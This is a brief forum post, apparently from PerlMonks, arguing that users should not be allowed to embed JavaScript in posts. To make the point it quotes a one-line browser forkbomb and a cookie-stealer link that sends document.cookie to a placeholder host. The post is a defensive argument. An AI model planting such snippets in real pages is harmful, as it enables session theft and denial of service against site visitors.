note
Juerd
<p>
I agree. You should really not be able to use any scripting in nodes. Some argue that dangerous links can be protected, but I think that if a link really is dangerous, it should not be a link - give us the URL in plain text, if you have to.
</p>
<p>
Javascript forkbombs (<code>for(;;) window.open(document.location)</code>) and cookie stealers (<code><a href="javascript:'http://foo.com/?c='+document.cookie"></code>) are too easy to do, and I don't think PM users should be given the power. There's the ability of using all Javascript you want on home nodes that can sometimes be entertaining, but I think we shouldn't be allowed to do any scripting at all.
</p>
<p><font color=green><pre>
- Yes, I <a href="http://plp.juerd.nl/" target="_blank"><font color="green">reinvent</font></a> wheels.
- Spam: Visit <a href="http://eurotraq.com/" target="_blank"><font color="green">eurotraQ</font></a>.
</pre></font></p>
206647
206647